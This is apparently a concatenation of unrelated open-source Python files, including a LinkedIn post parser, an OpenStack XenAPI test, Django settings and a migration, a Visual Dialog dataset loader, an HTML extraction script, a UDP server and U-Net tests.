l_posts[elements_current_index][post_key] = post_value
else:
l_posts.append({post_key: post_value})
return l_posts
def parse_list_raw_urns(l_raw_urns):
"""Iterates a list containing posts URNS and retrieves list of URNs
:param l_raw_urns: List containing posts URNs
:type l_raw_urns: list
:return: List of URNs
:rtype: list
"""
l_urns = []
for i in l_raw_urns:
l_urns.append(get_urn_from_raw_update(i))
return l_urns
def parse_list_raw_posts(l_raw_posts, linkedin_base_url):
"""Iterates a unsorted list containing post fields and assemble a
list of dicts, each one of them contains a post
:param l_raw_posts: Unsorted list containing posts information
:type l_raw_posts: list
:param linkedin_base_url: Linkedin URL
:type linkedin_base_url: str
:return: List of dicts, each one of them is a post
:rtype: list
"""
l_posts = []
for i in l_raw_posts:
author_name = get_update_author_name(i)
if author_name:
l_posts = append_update_post_field_to_posts_list(
i, l_posts, "author_name", author_name
)
author_profile = get_update_author_profile(i, linkedin_base_url)
if author_profile:
l_posts = append_update_post_field_to_posts_list(
i, l_posts, "author_profile", author_profile
)
old = get_update_old(i)
if old:
l_posts = append_update_post_field_to_posts_list(i, l_posts, "old", old)
content = get_update_content(i, linkedin_base_url)
if content:
l_posts = append_update_post_field_to_posts_list(
i, l_posts, "content", content
)
url = get_update_url(i, linkedin_base_url)
if url:
l_posts = append_update_post_field_to_posts_list(i, l_posts, "url", url)
return l_posts
def get_list_posts_sorted_without_promoted(l_urns, l_posts):
"""Iterates l_urns and looks for corresponding dicts in l_posts matching 'url' key.
If found, removes this dict from l_posts and appends it to the returned list of posts
:param l_urns: List of posts URNs
:type l_urns: list
:param l_posts: List of dicts, which each of them is a post
:type l_posts: list
:return: List of dicts, each one of them is a post
:rtype: list
"""
l_posts_sorted_without_promoted = []
l_posts[:] = [d for d in l_posts if "Promoted" not in d.get("old")]
for urn in l_urns:
for post in l_posts:
if urn in post["url"]:
l_posts_sorted_without_promoted.append(post)
l_posts[:] = [d for d in l_posts if urn not in d.get("url")]
break
return l_posts_sorted_without_promoted
| [
"[email protected]"
] | |
eb072ee218d2a1895d7da00df4591fd81018b7c7 | 584db1be8b6bdedaa56d186692ad72da5ee07164 | /patron/tests/unit/virt/xenapi/test_driver.py | f8674f0cec1082ea4a77834f9a8001aa2c43c8e8 | [
"Apache-2.0"
] | permissive | casbin/openstack-patron | 66006f57725cf1c3d735cd5529d3459fd77384c8 | b41b1262f3a52c8cc9f6b6bdf87be5a1abcf6d25 | refs/heads/master | 2023-05-31T05:23:37.721768 | 2015-12-31T12:18:17 | 2015-12-31T12:18:17 | 382,054,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,308 | py | # Copyright (c) 2013 Rackspace Hosting
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import mock
from oslo_utils import units
from patron.compute import arch
from patron.tests.unit.virt.xenapi import stubs
from patron.virt import driver
from patron.virt import fake
from patron.virt import xenapi
from patron.virt.xenapi import driver as xenapi_driver
class XenAPIDriverTestCase(stubs.XenAPITestBaseNoDB):
"""Unit tests for Driver operations."""
def _get_driver(self):
stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
self.flags(connection_url='test_url',
connection_password='test_pass', group='xenserver')
return xenapi.XenAPIDriver(fake.FakeVirtAPI(), False)
def host_stats(self, refresh=True):
return {'host_memory_total': 3 * units.Mi,
'host_memory_free_computed': 2 * units.Mi,
'disk_total': 5 * units.Gi,
'disk_used': 2 * units.Gi,
'disk_allocated': 4 * units.Gi,
'host_hostname': 'somename',
'supported_instances': arch.X86_64,
'host_cpu_info': {'cpu_count': 50},
'cpu_model': {
'vendor': 'GenuineIntel',
'model': 'Intel(R) Xeon(R) CPU X3430 @ 2.40GHz',
'topology': {
'sockets': 1,
'cores': 4,
'threads': 1,
},
'features': [
'fpu', 'de', 'tsc', 'msr', 'pae', 'mce',
'cx8', 'apic', 'sep', 'mtrr', 'mca',
'cmov', 'pat', 'clflush', 'acpi', 'mmx',
'fxsr', 'sse', 'sse2', 'ss', 'ht',
'nx', 'constant_tsc', 'nonstop_tsc',
'aperfmperf', 'pni', 'vmx', 'est', 'ssse3',
'sse4_1', 'sse4_2', 'popcnt', 'hypervisor',
'ida', 'tpr_shadow', 'vnmi', 'flexpriority',
'ept', 'vpid',
],
},
'vcpus_used': 10,
'pci_passthrough_devices': '',
'host_other-config': {'iscsi_iqn': 'someiqn'}}
def test_available_resource(self):
driver = self._get_driver()
driver._session.product_version = (6, 8, 2)
self.stubs.Set(driver.host_state, 'get_host_stats', self.host_stats)
resources = driver.get_available_resource(None)
self.assertEqual(6008002, resources['hypervisor_version'])
self.assertEqual(50, resources['vcpus'])
self.assertEqual(3, resources['memory_mb'])
self.assertEqual(5, resources['local_gb'])
self.assertEqual(10, resources['vcpus_used'])
self.assertEqual(3 - 2, resources['memory_mb_used'])
self.assertEqual(2, resources['local_gb_used'])
self.assertEqual('xen', resources['hypervisor_type'])
self.assertEqual('somename', resources['hypervisor_hostname'])
self.assertEqual(1, resources['disk_available_least'])
def test_overhead(self):
driver = self._get_driver()
instance = {'memory_mb': 30720, 'vcpus': 4}
# expected memory overhead per:
# https://wiki.openstack.org/wiki/XenServer/Overhead
expected = ((instance['memory_mb'] * xenapi_driver.OVERHEAD_PER_MB) +
(instance['vcpus'] * xenapi_driver.OVERHEAD_PER_VCPU) +
xenapi_driver.OVERHEAD_BASE)
expected = math.ceil(expected)
overhead = driver.estimate_instance_overhead(instance)
self.assertEqual(expected, overhead['memory_mb'])
def test_set_bootable(self):
driver = self._get_driver()
self.mox.StubOutWithMock(driver._vmops, 'set_bootable')
driver._vmops.set_bootable('inst', True)
self.mox.ReplayAll()
driver.set_bootable('inst', True)
def test_post_interrupted_snapshot_cleanup(self):
driver = self._get_driver()
fake_vmops_cleanup = mock.Mock()
driver._vmops.post_interrupted_snapshot_cleanup = fake_vmops_cleanup
driver.post_interrupted_snapshot_cleanup("context", "instance")
fake_vmops_cleanup.assert_called_once_with("context", "instance")
def test_public_api_signatures(self):
inst = self._get_driver()
self.assertPublicAPISignatures(driver.ComputeDriver(None), inst)
def test_get_volume_connector(self):
ip = '123.123.123.123'
driver = self._get_driver()
self.flags(connection_url='http://%s' % ip,
connection_password='test_pass', group='xenserver')
self.stubs.Set(driver.host_state, 'get_host_stats', self.host_stats)
connector = driver.get_volume_connector({'uuid': 'fake'})
self.assertIn('ip', connector)
self.assertEqual(connector['ip'], ip)
self.assertIn('initiator', connector)
self.assertEqual(connector['initiator'], 'someiqn')
def test_get_block_storage_ip(self):
my_ip = '123.123.123.123'
connection_ip = '124.124.124.124'
driver = self._get_driver()
self.flags(connection_url='http://%s' % connection_ip,
group='xenserver')
self.flags(my_ip=my_ip, my_block_storage_ip=my_ip)
ip = driver._get_block_storage_ip()
self.assertEqual(connection_ip, ip)
def test_get_block_storage_ip_conf(self):
driver = self._get_driver()
my_ip = '123.123.123.123'
my_block_storage_ip = '124.124.124.124'
self.flags(my_ip=my_ip, my_block_storage_ip=my_block_storage_ip)
ip = driver._get_block_storage_ip()
self.assertEqual(my_block_storage_ip, ip)
| [
"[email protected]"
] | |
7a08948419da7bf634db355ebdf9a7f31dfd17f5 | cff22053a94d9c2b97fc0c0a420f627d8cb30cd4 | /Django2(only)_blog_one_with_comment/myfirst/myfirst/settings.py | 45288ea87136dd657a962acee896ef5f169e68a0 | [] | no_license | Pasha-lt/My-Project | a8636b8dff3fd748aaf8752024d33263aa42a60b | 57dd55ce910f259b9b434db5476361c967a1ca0f | refs/heads/master | 2022-12-13T04:51:52.877732 | 2020-07-13T17:29:09 | 2020-07-13T17:29:09 | 238,881,337 | 0 | 0 | null | 2022-12-08T03:47:23 | 2020-02-07T09:00:10 | CSS | UTF-8 | Python | false | false | 3,580 | py | """
Django settings for myfirst project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_ROOT = os.path.dirname(__file__)
sys.path.insert(0, os.path.join(PROJECT_ROOT, 'apps'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*y_1eykpk6pmryy5y&xga*#3y5+a(^vum&ec=zt%nl*f*zvd@1'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'articles.apps.ArticlesConfig', # Указываем наше написаное приложение.
'grappelli', # Библиотека для админки
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myfirst.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(PROJECT_ROOT, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
],
},
},
]
WSGI_APPLICATION = 'myfirst.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'ru-RU'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static') # пишем что бы обрабатывало grappelli | [
"[email protected]"
] | |
72ac156b2524eb314454f757d63de6933cd620b4 | 460a4bf1f736e7f484a0c26b10deaf6b2eb13bd2 | /venv_ML_CSG/bin/jupyter | 554741b6493b447707e5e914ade27a2015183de6 | [] | no_license | igor17400/machineLearningCallEvaluation | ff6fe668e87e6bd5884f4f87b62a242d37973dee | 1c157e7a9486305ce79c0dcf5284f6cba503d948 | refs/heads/master | 2023-01-13T22:48:32.053394 | 2020-11-12T05:48:46 | 2020-11-12T05:48:46 | 296,180,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | #!/Users/igorlimarochaazevedo/Documents/Cellcrypt/machineLearningCallEvaluation/venv_ML_CSG/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_core.command import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
4a404290eef8c70049ea154977a634238d6797a0 | a72f39b82966cd6e2a3673851433ce7db550429a | /imix/data/loaders/visual_dialog_dataset.py | 1ff1aed7483afe4283ef3a5267e1db67c5410fa9 | [
"Apache-2.0"
] | permissive | linxi1158/iMIX | 85841d6b95e1d99ed421a1ac3667658e49cae6fc | af87a17275f02c94932bb2e29f132a84db812002 | refs/heads/master | 2023-06-09T23:37:46.534031 | 2021-06-30T12:09:42 | 2021-06-30T12:09:42 | 381,608,650 | 0 | 0 | Apache-2.0 | 2021-06-30T07:08:40 | 2021-06-30T07:08:39 | null | UTF-8 | Python | false | false | 10,038 | py | from torch.utils.data import Dataset
from imix.data.reader.visual_dialog_reader import VisDiaReader
from imix.data.infocomp.visual_dialog_infocpler import VisDiaInfoCpler
from imix.data.builder import DATASETS
import torch
import json
from transformers.tokenization_bert import BertTokenizer
from imix.data.reader.feature_reader.image_features_reader import ImageFeaturesH5Reader
from ..utils.data_utils import encode_input, encode_image_input
import os
dataset_root_path = '/home/datasets/mix_data/iMIX/data/datasets/visdial_data/'
@DATASETS.register_module()
class VisDialDataset(Dataset):
def __init__(self, reader, info_cpler, limit_nums=None):
self.reader = VisDiaReader(reader)
self.info_cpler = VisDiaInfoCpler(info_cpler)
self._limit_sample_nums = limit_nums
self._splits = self.reader.splits
def __len__(self):
if self._limit_sample_nums and self._limit_sample_nums > 0:
return min(len(self.reader), self._limit_sample_nums)
return len(self.reader)
def __getitem__(self, idx):
item_feature = self.reader[idx]
item = self.info_cpler.complete_info(item_feature=item_feature, split=self._splits[0])
return item
@DATASETS.register_module()
class VisdialDatasetDense(Dataset):
params = {
'num_train_samples':
0,
'num_val_samples':
0,
'visdial_image_feats':
os.path.join(dataset_root_path, 'features', 'visdial_img_feat.lmdb'),
'visdial_processed_train_dense':
os.path.join(dataset_root_path, 'pre_process_annotations', 'visdial_1.0_train_dense_processed.json'),
'visdial_processed_val':
os.path.join(dataset_root_path, 'pre_process_annotations', 'visdial_1.0_val_processed.json'),
'visdial_processed_train_dense_annotations':
os.path.join(dataset_root_path, 'pre_process_annotations',
'visdial_1.0_train_dense_annotations_processed.json'),
'visdial_processed_val_dense_annotations':
os.path.join(dataset_root_path, 'pre_process_annotations', 'visdial_1.0_val_dense_annotations_processed.json'),
'num_options':
100,
'visdial_tot_rounds':
11,
'overfit':
None,
'max_seq_len':
256,
}
def __init__(self):
"""Initialization."""
params = self.params
self.numDataPoints = {}
num_samples_train = params['num_train_samples']
num_samples_val = params['num_val_samples']
self._image_features_reader = ImageFeaturesH5Reader(params['visdial_image_feats'])
with open(params['visdial_processed_train_dense']) as f:
self.visdial_data_train = json.load(f)
if params['overfit']:
if num_samples_train:
self.numDataPoints['train'] = num_samples_train
else:
self.numDataPoints['train'] = 5
else:
if num_samples_train:
self.numDataPoints['train'] = num_samples_train
else:
self.numDataPoints['train'] = len(self.visdial_data_train['data']['dialogs'])
with open(params['visdial_processed_val']) as f:
self.visdial_data_val = json.load(f)
if params['overfit']:
if num_samples_val:
self.numDataPoints['val'] = num_samples_val
else:
self.numDataPoints['val'] = 5
else:
if num_samples_val:
self.numDataPoints['val'] = num_samples_val
else:
self.numDataPoints['val'] = len(self.visdial_data_val['data']['dialogs'])
self.overfit = params['overfit']
with open(params['visdial_processed_train_dense_annotations']) as f:
self.visdial_data_train_ndcg = json.load(f)
with open(params['visdial_processed_val_dense_annotations']) as f:
self.visdial_data_val_ndcg = json.load(f)
# train val setup
self.numDataPoints['trainval'] = self.numDataPoints['train'] + self.numDataPoints['val']
self.num_options = params['num_options']
self._split = 'train'
self.subsets = ['train', 'val', 'trainval']
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
self.tokenizer = tokenizer
# fetching token indicecs of [CLS] and [SEP]
tokens = ['[CLS]', '[MASK]', '[SEP]']
indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
self.CLS = indexed_tokens[0]
self.MASK = indexed_tokens[1]
self.SEP = indexed_tokens[2]
self.params = params
self._max_region_num = 37
def __len__(self):
return self.numDataPoints[self._split]
@property
def split(self):
return self._split
@split.setter
def split(self, split):
assert split in self.subsets
self._split = split
def __getitem__(self, index):
def pruneRounds(context, num_rounds):
start_segment = 1
len_context = len(context)
cur_rounds = (len(context) // 2) + 1
l_index = 0
if cur_rounds > num_rounds:
# caption is not part of the final input
l_index = len_context - (2 * num_rounds)
start_segment = 0
return context[l_index:], start_segment
# Combining all the dialog rounds with the [SEP] and [CLS] token
MAX_SEQ_LEN = self.params['max_seq_len']
cur_data = None
cur_dense_annotations = None
if self._split == 'train':
cur_data = self.visdial_data_train['data']
cur_dense_annotations = self.visdial_data_train_ndcg
elif self._split == 'val':
if self.overfit:
cur_data = self.visdial_data_train['data']
cur_dense_annotations = self.visdial_data_train_ndcg
else:
cur_data = self.visdial_data_val['data']
cur_dense_annotations = self.visdial_data_val_ndcg
else:
if index >= self.numDataPoints['train']:
cur_data = self.visdial_data_val
cur_dense_annotations = self.visdial_data_val_ndcg
index -= self.numDataPoints['train']
else:
cur_data = self.visdial_data_train
cur_dense_annotations = self.visdial_data_train_ndcg
# number of options to score on
num_options = self.num_options
assert num_options == 100
dialog = cur_data['dialogs'][index]
cur_questions = cur_data['questions']
cur_answers = cur_data['answers']
img_id = dialog['image_id']
assert img_id == cur_dense_annotations[index]['image_id']
cur_rnd_utterance = [self.tokenizer.encode(dialog['caption'])]
options_all = []
cur_rounds = cur_dense_annotations[index]['round_id']
for rnd, utterance in enumerate(dialog['dialog'][:cur_rounds]):
cur_rnd_utterance.append(self.tokenizer.encode(cur_questions[utterance['question']]))
if rnd != cur_rounds - 1:
cur_rnd_utterance.append(self.tokenizer.encode(cur_answers[utterance['answer']]))
for answer_option in dialog['dialog'][cur_rounds - 1]['answer_options']:
cur_option = cur_rnd_utterance.copy()
cur_option.append(self.tokenizer.encode(cur_answers[answer_option]))
options_all.append(cur_option)
assert len(cur_option) == 2 * cur_rounds + 1
gt_option = dialog['dialog'][cur_rounds - 1]['gt_index']
tokens_all = []
mask_all = []
segments_all = []
sep_indices_all = []
hist_len_all = []
for _, option in enumerate(options_all):
option, start_segment = pruneRounds(option, self.params['visdial_tot_rounds'])
tokens, segments, sep_indices, mask = encode_input(
option, start_segment, self.CLS, self.SEP, self.MASK, max_seq_len=MAX_SEQ_LEN, mask_prob=0)
tokens_all.append(tokens)
mask_all.append(mask)
segments_all.append(segments)
sep_indices_all.append(sep_indices)
hist_len_all.append(torch.LongTensor([len(option) - 1]))
tokens_all = torch.cat(tokens_all, 0)
mask_all = torch.cat(mask_all, 0)
segments_all = torch.cat(segments_all, 0)
sep_indices_all = torch.cat(sep_indices_all, 0)
hist_len_all = torch.cat(hist_len_all, 0)
item = {}
item['tokens'] = tokens_all.unsqueeze(0)
item['segments'] = segments_all.unsqueeze(0)
item['sep_indices'] = sep_indices_all.unsqueeze(0)
item['mask'] = mask_all.unsqueeze(0)
item['hist_len'] = hist_len_all.unsqueeze(0)
item['image_id'] = torch.LongTensor([img_id])
# add image features. Expand them to create batch * num_rounds * num options * num bbox * img feats
features, num_boxes, boxes, _, image_target = self._image_features_reader[img_id]
features, spatials, image_mask, image_target, image_label = encode_image_input(
features, num_boxes, boxes, image_target, max_regions=self._max_region_num, mask_prob=0)
item['image_feat'] = features
item['image_loc'] = spatials
item['image_mask'] = image_mask
item['image_target'] = image_target
item['image_label'] = image_label
# add dense annotation fields
item['gt_relevance_round_id'] = torch.LongTensor([cur_rounds])
item['gt_relevance'] = torch.Tensor(cur_dense_annotations[index]['relevance'])
item['gt_option'] = torch.LongTensor([gt_option])
# add next sentence labels for training with the nsp loss as well
nsp_labels = torch.ones(*tokens_all.unsqueeze(0).shape[:-1])
nsp_labels[:, gt_option] = 0
item['next_sentence_labels'] = nsp_labels.long()
return item
| [
"[email protected]"
] | |
df2d58f94c00c797d30176fc3455dcad5d0125e0 | 371e1dd2cc704b951238337ad0ec5697659a7908 | /shopping/migrations/0001_initial.py | a18608908801381c708b61892d9a5b28bea01cfd | [] | no_license | talluriabhishek/shopping-app | 89e432827b3919aa7709926bb876d660688149c6 | 6b22ba0400a19cb79d8da51b569a5a9800fbf4c0 | refs/heads/master | 2021-01-10T02:50:48.542201 | 2016-01-22T05:08:44 | 2016-01-22T05:08:44 | 50,147,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-22 00:30
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('description', models.TextField()),
('cost', models.FloatField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
c777b2d81bada506a7365c5637fbc842bcabaf80 | 4d9c13e61e61f3a6693e2ac427a1dcc93c749bd6 | /myparse.py | c83e15b8038e37bce0686783fbec2f3fe7044af9 | [] | no_license | yijiaohe/extractive-summs | 9b48e0eec7759acc1dde0a9fc7e43bb754dc5176 | f2c7d60cc3b8ebf7ad146097067cc26cc14952c5 | refs/heads/master | 2020-03-13T07:26:37.955091 | 2018-04-25T15:58:15 | 2018-04-25T15:58:15 | 131,025,583 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,942 | py | #!/usr/bin/env python3
import MySQLdb
import sys
import io
import operator
import getopt
import shutil
import os
from html.parser import HTMLParser
stop_tags = ['h1', 'h2', 'h3', 'p', 'dt', 'dd', 'blockquote']
empty_tags = ['area','base','br','col','embed','hr','img','input',
'link','meta','param','source','track','wbr']
class MyHTMLParser(HTMLParser):
'''
def __init__(self):
self.tag_stack = []
super(HTMLParser,self).__init__()
'''
def handle_starttag(self, tag, attrs):
if tag not in empty_tags:
self.tag_stack.append(tag)
pass
def handle_endtag(self, tag):
if tag in empty_tags:
return
ended_tag = self.tag_stack[-1]
if ended_tag != tag:
print("TAG MISMATCH: %s != %s"%(ended_tag,tag))
else:
self.tag_stack.pop()
if ended_tag in stop_tags:
self.content.append({'tag':ended_tag,'content':self.current.strip('\n')})
self.current = ""
# print()
# print("Encountered an end tag :", tag)
pass
def handle_data(self, data):
ts = self.tag_stack
current_tag = ts[-1] if len(ts) > 0 else ''
if ('body' in ts and
('p' in ts or 'dl' in ts or
#'h1' in ts or 'h2' in ts or 'h3' in ts or
'blockquote' in ts)):
self.current += data
# print("%s"%(data), end='')
class Node:
def __init__ (self,tag,content):
self.tag = tag
self.content = content
self.children = []
def add_child(self,child):
self.children.append(child)
def add_child_verbose(self,child):
print("Add %s to %s"%(child,self.content))
self.add_child(child)
def print_node(self):
print(self.tag)
print(self.content)
def filter(output_directory):
db = MySQLdb.connect("")
# prepare a cursor object using cursor() method
cursor = db.cursor()
# only use cards that have not been dropped
sql = "SELECT id, txtpath, url from resources0"
cursor.execute(sql)
html_list = cursor.fetchall()
db.close()
if not os.path.exists(output_directory):
os.makedirs(output_directory)
files_copied = 0
for html in html_list:
textpath = str(html[1])
if textpath == '':
continue
if (textpath[0] != 'u'):
continue
r = str(int(html[0]))
url = str(html[2])
# in_file_path = os.path.join(input_directory, r +".txt")
out_file_path = os.path.join(output_directory, r +".txt")
if not (os.path.isfile(out_file_path)):
# copy original parsed version
# file_path = os.path.join(input_directory, r +".txt")
# # only copy file if it exists in parsed cards directory
# if (os.path.isfile(file_path)):
# shutil.copy(file_path, output_directory)
# files_copied += 1
print(out_file_path)
# reparse link
try:
dir1 = "/data/corpora/newaan0/raw_html2/" + r + "/" + os.listdir("/data/corpora/newaan0/raw_html2/" + r)[0]
myfile = dir1 + "/" + os.listdir(dir1)[0]
# f = urllib.urlopen(url)
f = open(myfile, "r")
h = f.read().decode('utf-8')
parser = MyHTMLParser()
parser.tag_stack = []
parser.content = []
parser.current = ""
parser.feed(h)
tree = []
node_stack = []
# print tags
for block in parser.content:
# make node
node = Node(block['tag'],block['content'])
# empty node stack => add to top level tree
if len(node_stack) == 0:
node_stack.append(node)
tree.append(node)
continue
# compare to previous tag in stack
tag = stop_tags.index(block['tag'])
while True:
prev = node_stack.pop()
prev_tag = stop_tags.index(prev.tag)
if tag > prev_tag or len(node_stack) == 0:
node_stack.append(prev)
break
if len(node_stack) > 0:
node_stack[-1].add_child(node)
else:
# print("appended to tree!")
tree.append(node)
node_stack.append(node)
f = open(out_file_path,'w+')
for n in tree:
print_tree(n,0, f)
f.close()
except Exception:
pass
# elif not (os.path.isfile(in_file_path)):
# print in_file_path + "not in directory"
# else:
# print "file exists"
# else:
# print "card does not exist: " + file_path
# Note: the number of files in the resulting directory is less than the files_copied indicator,
# due to same card used for different topics.
print(len(html_list), files_copied)
def print_tree(tree,indentation,filename):
content = tree.content
filename.write("\n")
# if len(tree.content) > 50:
# content = content[:50] + "..."
filename.write(content.encode('utf-8'))
for c in tree.children:
print_tree(c,indentation + 2, filename)
def print_usage():
print ("usage: " + sys.argv[0] + "-o output_directory")
# input_directory = None
output_directory = None
try:
opts, args = getopt.getopt(sys.argv[1:], 'o:')
except (getopt.GetoptError, err):
usage()
sys.exit(2)
for o, a in opts:
# if o == '-i':
# input_directory = a
if o == '-o':
output_directory = a
else:
assert False, "unhandled option"
if (output_directory== None):
print_usage()
sys.exit(2)
filter(output_directory)
| [
"[email protected]"
] | |
dc1572244f1304493d64d667155fcbbc94bf2c68 | 30f8afce1ba484183d8e1e14aae76cabb2d92354 | /pythonNet/day2/server_udp.py | 1d475122c9fb66755a8bb12c1c143cd7db4d6ed6 | [] | no_license | brooot/Python_Base_Codes | d83e8c3b8a37b86672412c812fdb0d47deb67836 | a864685e160b5df4162a6f9fb910627eda702aaf | refs/heads/master | 2023-04-10T20:08:39.161289 | 2021-03-25T12:59:23 | 2021-03-25T12:59:23 | 200,570,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | #!/usr/bin/env python3
from socket import *
# 创建套接字对象
sockfd = socket(AF_INET, SOCK_DGRAM)
# 绑定地址
IP = '0.0.0.0'
PORT = 8888
ADDR = (IP, PORT)
sockfd.bind(ADDR)
while True:
# 接受数据(与tcp不同)
data, addr = sockfd.recvfrom(1024)
message = "已收到来自%s的数据:%s" % (addr, data.decode())
print(message)
# 发送数据
send_message = "已经收到您的数据。".encode()
sockfd.sendto(send_message, addr)
sockfd.close() | [
"[email protected]"
] | |
9e147454ebbe583aae958e4c95cc4a87cd3a44ab | 5f9695616cce1c03013ae9a5e823ad686bf33b6e | /tests/test_unet2.py | 8d5f6867f0a173f479a72b89d2328f66e9994c1f | [
"MIT"
] | permissive | caiyunapp/leibniz | c9567685cafbc618d22487e408a27ba21cc8633e | 40bb6f088c5325701ca53506d7a66eb0a9ef4fef | refs/heads/master | 2023-04-16T18:31:27.194818 | 2021-09-13T15:54:57 | 2021-09-13T15:54:57 | 208,940,378 | 16 | 5 | null | null | null | null | UTF-8 | Python | false | false | 11,603 | py | # -*- coding: utf-8 -*-
import unittest
import torch as th
from leibniz.nn.net import resunet2
from leibniz.nn.layer.hyperbolic import HyperBasic
from leibniz.nn.layer.hyperbolic import HyperBottleneck
from leibniz.nn.layer.senet import SEBasicBlock, SEBottleneck
from leibniz.nn.layer.hyperbolic2 import HyperBasic as HyperBasic2, HyperBottleneck as HyperBottleneck2
class TestUnet(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test1D(self):
net = resunet2(1, 1, spatial=(32,))
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance')
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer')
net(th.rand(1, 1, 16))
def test2D(self):
resunet2(1, 1, spatial=(16, 16))
resunet2(1, 1, spatial=(16, 32))
resunet2(1, 1, spatial=(32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]])
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance')
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer')
net(th.rand(1, 1, 32, 16))
def test3D(self):
resunet2(1, 1, spatial=(16, 16, 16))
resunet2(1, 1, spatial=(32, 16, 16))
resunet2(1, 1, spatial=(16, 32, 16))
resunet2(1, 1, spatial=(16, 16, 32))
resunet2(1, 1, spatial=(11, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]])
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance')
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer')
net(th.rand(1, 1, 4, 16, 32))
def testHyp1D(self):
net = resunet2(1, 1, spatial=(32,), block=HyperBasic)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=HyperBasic)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=HyperBasic)
net(th.rand(1, 1, 16))
